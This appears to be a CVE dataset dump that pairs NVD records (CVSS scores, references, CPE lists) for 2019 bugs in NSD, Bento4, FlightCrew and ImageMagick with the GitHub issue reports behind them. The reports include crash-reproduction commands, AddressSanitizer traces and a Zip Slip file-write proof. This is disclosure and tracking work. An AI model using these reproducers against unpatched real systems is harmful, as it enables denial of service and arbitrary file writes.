Hi, While fuzzing nsd-checkzone with American Fuzzy Lop, I found a Stack-based Buffer Overflow in the dname_concatenate() function, in dname.c L464. Attaching a reproducer (gzipped so GitHub accepts it), issue can be reproduced by running: nsd-checkzone all.rr zone02 [zone02.gz](https://github.com/NLnetLabs/nsd/files/3339084/zone02.gz) ================================================================= ==7395==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcd6a9763f at pc 0x0000004dadbc bp 0x7ffcd6a97510 sp 0x7ffcd6a96cc0 WRITE of size 8 at 0x7ffcd6a9763f thread T0 #0 0x4dadbb in __asan_memcpy (/home/fcambus/nsd/nsd-checkzone+0x4dadbb) #1 0x534251 in dname_concatenate /home/fcambus/nsd/dname.c:464:2 #2 0x69e61f in yyparse /home/fcambus/nsd/./zparser.y:1024:12 #3 0x689fd1 in zonec_read /home/fcambus/nsd/zonec.c:1623:2 #4 0x6aedd1 in check_zone /home/fcambus/nsd/nsd-checkzone.c:61:11 #5 0x6aea07 in main /home/fcambus/nsd/nsd-checkzone.c:127:2 #6 0x7fa60ece6b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #7 0x41c1d9 in _start (/home/fcambus/nsd/nsd-checkzone+0x41c1d9) Address 0x7ffcd6a9763f is located in stack of thread T0 at offset 287 in frame #0 0x533f8f in dname_concatenate /home/fcambus/nsd/dname.c:458 This frame has 1 object(s): [32, 287) 'temp' (line 459) <== Memory access at offset 287 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/fcambus/nsd/nsd-checkzone+0x4dadbb) in __asan_memcpy Shadow bytes around the buggy address: 0x10001ad4ae70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10001ad4ae80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10001ad4ae90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10001ad4aea0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 0x10001ad4aeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10001ad4aec0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3 0x10001ad4aed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10001ad4aee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10001ad4aef0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 0x10001ad4af00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10001ad4af10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==7395==ABORTING
Stack-based Buffer Overflow in the dname_concatenate() function
https://api.github.com/repos/NLnetLabs/nsd/issues/20/comments
2
2019-06-28T12:12:53Z
2019-07-04T07:22:35Z
https://github.com/NLnetLabs/nsd/issues/20
462,005,202
20
482
CVE-2019-13238
2019-07-04T14:15:10.853
An issue was discovered in Bento4 1.5.1.0. A memory allocation failure is unhandled in Core/Ap4SdpAtom.cpp and leads to crashes. When parsing input video, the program allocates a new buffer to parse an atom in the stream. The unhandled memory allocation failure causes a direct copy to a NULL pointer.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/396" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/396" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/396
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A memory allocation failure unhandled in Ap4SdpAtom.cpp and leads to crashes. `./mp42aac input_file /dev/null` In file Source/C++/Core/Ap4SdpAtom.cpp <img width="640" alt="image" src="https://user-images.githubusercontent.com/7632714/58334121-73c1dd80-7e71-11e9-88a2-c9fbd2129068.png"> AP4_SdpAtom allocate a new buffer to parse the atom in the stream. The unhandled memory allocation failure cause the read content memcpy to a null pointer. <img width="553" alt="image" src="https://user-images.githubusercontent.com/7632714/58333799-d23a8c00-7e70-11e9-9bc3-89b928919860.png"> This is the start points. In file In file Source/C++/Core/Ap4ByteStream.cpp ![image](https://user-images.githubusercontent.com/7632714/58333856-ec746a00-7e70-11e9-9433-39bfc5eaecd1.png) ![image](https://user-images.githubusercontent.com/7632714/58333942-19288180-7e71-11e9-9483-a6682b51c009.png) AP4_CopyMemory is the macro define of memcpy and the path formed. Asan trace report: > ==79431==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf725e797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7263a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf71d507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7261e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf71da229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf7256e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x873013b in AP4_SdpAtom::AP4_SdpAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.cpp:60 #7 0x82dcab1 in AP4_SdpAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.h:54 #8 0x82dcab1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:595 #9 0x83016d3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221 #10 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #11 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #12 0x82be680 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:88 #13 0x82dc711 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:764 #14 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221 #15 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #16 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #17 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #18 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #19 0xf69df636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #20 0x808df1b (/mnt/data/playground/mp42-a/Build/mp42aac+0x808df1b) [input_file.zip](https://github.com/axiomatic-systems/Bento4/files/3217304/input_file.zip)
Exhaustive memory misunhandle
https://api.github.com/repos/axiomatic-systems/Bento4/issues/396/comments
0
2019-05-24T14:17:26Z
2019-08-25T16:31:09Z
https://github.com/axiomatic-systems/Bento4/issues/396
448,195,676
396
483
CVE-2019-13241
2019-07-04T15:15:11.280
FlightCrew v0.9.2 and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a ZIP archive entry that is mishandled during extraction.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sigil-Ebook/flightcrew/issues/52" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://salvatoresecurity.com/fun-with-fuzzers-how-i-discovered-three-vulnerabilities-part-3-of-3/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4055-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sigil-Ebook/flightcrew/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://salvatoresecurity.com/fun-with-fuzzers-how-i-discovered-three-vulnerabilities-part-3-of-3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4055-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flightcrew_project:flightcrew:*:*:*:*:*:sigil:*:*", "matchCriteriaId": "9CD25AA7-C650-4A1E-ABA6-5F189B404CC9", "versionEndExcluding": null, "versionEndIncluding": "0.9.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/Sigil-Ebook/flightcrew/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Sigil-Ebook", "flightcrew" ]
**Summary** FlightCrew v0.9.2 and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as 'Zip Slip'. **Impact** This vulnerability can be used to write files to arbitrary locations and could potentially result in granting an attacker remote access or arbitrary code execution. This is a medium severity issue for Sigil users, but may have greater impact on third-party software that uses FlightCrew as a library. **Steps to Reproduce** 1) Download the attached "zip-slip.zip" 2) On a linux system, process the epub using flightcrew-cli. `flightcrew-cli --input-file zip-slip.zip` 3) Check for the existence of "/tmp/evil.txt" with the contents "this is an evil one". **Futher Reading** For more information on zip-slip vulnerabilities, see https://snyk.io/research/zip-slip-vulnerability [zip-slip.zip](https://github.com/Sigil-Ebook/flightcrew/files/3330751/zip-slip.zip)
Zip Slip Vulnerability in FlightCrew
https://api.github.com/repos/Sigil-Ebook/flightcrew/issues/52/comments
26
2019-06-26T15:23:52Z
2019-07-06T19:48:52Z
https://github.com/Sigil-Ebook/flightcrew/issues/52
461,037,201
52
484
CVE-2019-13295
2019-07-05T01:15:09.907
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/a7759f410b773a1dd57b0e1fb28112e1cd8b97bc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1608" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/55e6dc49f1a381d9d511ee2f888fdc3e3c3e3953" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/a7759f410b773a1dd57b0e1fb28112e1cd8b97bc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1608" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/55e6dc49f1a381d9d511ee2f888fdc3e3c3e3953" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1608
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/threshold.c:323:33 in AdaptiveThresholdImage ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 "(" magick:logo +repage ")" "(" magick:wizard -lat 0x564-42% ")" -quiet tmp` Here's ASAN log. ``` ==10393==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8ba61737f0 at pc 0x7f8bb5c0f9fa bp 0x7ffc04d5fad0 sp 0x7ffc04d5fac8 READ of size 4 at 0x7f8ba61737f0 thread T0 #0 0x7f8bb5c0f9f9 in AdaptiveThresholdImage MagickCore/threshold.c:323:33 #1 0x7f8bb51c1cb6 in CLISimpleOperatorImage MagickWand/operation.c:2571:21 #2 0x7f8bb51b6c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #3 0x7f8bb51dc315 in CLIOption MagickWand/operation.c:5273:16 #4 0x7f8bb501da99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #5 0x7f8bb501ed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #6 0x7f8bb5068ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #7 0x526f95 in MagickMain utilities/magick.c:149:10 #8 0x5268e1 in main utilities/magick.c:180:10 #9 0x7f8bafadfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x41b069 in _start (install/bin/magick+0x41b069) 0x7f8ba61737f0 is located 16 bytes to the left of 4331520-byte region [0x7f8ba6173800,0x7f8ba6595000) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f8bb5a57ed6 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f8bb57aeccc in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0x7f8bb579c13b in SetPixelCacheNexusPixels MagickCore/cache.c:5070:12 #4 0x7f8bb5793b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0x7f8bb57b1ea6 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x7f8bb5c0ef20 in AdaptiveThresholdImage MagickCore/threshold.c:257:7 #7 0x7f8bb51c1cb6 in CLISimpleOperatorImage MagickWand/operation.c:2571:21 #8 0x7f8bb51b6c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #9 0x7f8bb51dc315 in CLIOption MagickWand/operation.c:5273:16 #10 0x7f8bb501da99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f8bb501ed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f8bb5068ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f8bafadfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/threshold.c:323:33 in AdaptiveThresholdImage ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/threshold.c:323:33 in AdaptiveThresholdImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1608/comments
2
2019-06-21T05:58:31Z
2019-07-08T01:48:18Z
https://github.com/ImageMagick/ImageMagick/issues/1608
459,023,037
1,608
485
CVE-2019-13296
2019-07-05T01:15:09.983
ImageMagick 7.0.8-50 Q16 has direct memory leaks in AcquireMagickMemory because of an error in CLIListOperatorImages in MagickWand/operation.c for a NULL value.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/ce08a3691a8ac29125e29fc41967b3737fa3f425" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1604" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/ce08a3691a8ac29125e29fc41967b3737fa3f425" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1604" } ]
